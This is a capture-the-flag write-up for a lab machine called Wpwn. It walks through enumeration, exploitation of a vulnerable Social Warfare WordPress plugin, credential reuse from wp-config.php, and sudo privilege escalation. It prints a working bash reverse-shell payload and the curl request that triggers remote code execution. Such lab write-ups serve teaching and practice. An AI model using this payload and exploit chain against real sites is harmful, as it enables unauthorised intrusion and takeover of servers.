Wpwn - OSPG

September 10, 2021

Tags: | ctf | red | linux |

Read this in "about 5 minutes".

Summary

social-warfare plugin of the target system is vulnerable to Unauthenticated Remote Code Execution. After obtained the initial access, we can then compromise a local user via plaintext credentials found in a wordpress config file. Finally, privilege escalation is achieved through misconfigured sudo permission.

Enumeration

Nmap

We’ll begin with a nmap scan.

$ nmap --open -sV -A -p- -vv -n -Pn -oN nmap/services.txt 192.168.162.123
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).

Let’s us further investigate the HTTP service running on port 80.

Web Application

Employ ffuf - a hidden web directories scanner as below.

$ ffuf -u $URL -w /usr/share/seclists/Discovery/Web-Content/common.txt | tee ffuf/http.txt
index.html              [Status: 200, Size: 23, Words: 4, Lines: 4]
robots.txt              [Status: 200, Size: 57, Words: 10, Lines: 3]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10]
wordpress               [Status: 301, Size: 322, Words: 20, Lines: 10]
:: Progress: [4686/4686] :: Job [1/1] :: 156 req/sec :: Duration: [0:00:33] :: Errors: 0 ::

We found the wordpress directory appears interesting for additional enumerations.

WPScan

To effectively enumerate wordpress, we employ a tool called wpscan.

Let’s us see how we can use the tool to enumerate all users and available plugins of wordpress.

On the terminal, we run the following command

$ wpscan --url http://192.168.162.123/wordpress/ -e u,ap -t 10
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_| 
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18 
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
...
[+] social-warfare
 | Location: http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |                                    
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)          
 |
 | Version: 3.5.2 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.162.123/wordpress/, Match: 'Social Warfare v3.5.2'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/wp-content/plugins/social-warfare/readme.txt
...
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.162.123/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection) 

Analyzing the outputs, we discover the social-warfare v3.5.2 plugin and the user admin.

Now, we drop our attention toward the plugin. That said, we can test whether it is commonly exploitable with searchsploit.

$ searchsploit wordpress social warfare
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution                                                                                             | php/webapps/46794.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploitation

There is a high chance that our target is vulnerable to the attack. In order to test our theory, we run the following commands.

[1]. Create a file called payload.txt, which stores a reverse shell.

Example content of payload.txt.

<pre>system('bash -c "bash -i >& /dev/tcp/192.168.49.162/53 0>&1"')</pre>

[2]. Start a HTTP server using python.

$ python3 -m http.server 80

[3]. Trigger the payload.

$ curl -s http://192.168.162.123/wordpress/wp-admin/admin-post.php\?swp_debug=load_options\&swp_url=http://192.168.49.162/payload.txt

After the final command is executed, our nc listener should catch the reverse shell at port 80 as www-data.

$ nc -nlvp 53                                                                                                                                                                           1 ⨯
listening on [any] 53 ...
connect to [192.168.49.162] from (UNKNOWN) [192.168.162.123] 51492
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Plaintext Password

The wp-config.php file divulges a plaintext password of a wordpress database.

www-data@wpwn:/var/www/html/wordpress$ cat wp-config.php
<?php
...
define( 'DB_NAME', 'wordpress_db' );            
/** MySQL database username */
define( 'DB_USER', 'wp_user' );                       
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );  

Try to login as takis user with the password, we are luckily secured a shell as takis.

Sudo Permisson

From the takis shell, we can execute any sudo command

takis@wpwn:~$ sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

and flexibly compromise root access.

takis@wpwn:~$ sudo su
root@wpwn:/home/takis# id
uid=0(root) gid=0(root) groups=0(root)

Home